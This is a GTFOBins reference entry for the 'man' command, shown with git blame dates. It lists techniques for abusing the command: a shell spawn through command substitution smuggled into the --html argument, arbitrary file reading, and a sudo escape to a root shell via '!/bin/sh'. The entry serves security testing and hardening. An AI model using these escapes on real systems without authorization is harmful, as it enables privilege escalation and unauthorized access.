GTFOBins.github.io/_gtfobins/man.md

14 lines
307 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
2021-02-05 13:41:12 +01:00
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
2018-05-21 21:14:41 +02:00
functions:
2018-10-05 19:55:38 +02:00
shell:
2018-07-16 15:01:50 +02:00
- code: |
man --html='$(sh > /dev/tty)' sh
2018-07-04 20:26:52 +02:00
file-read:
2018-07-16 15:01:50 +02:00
- code: man file_to_read
2018-10-05 19:55:38 +02:00
sudo:
2018-07-16 15:01:50 +02:00
- code: |
sudo man man
!/bin/sh
---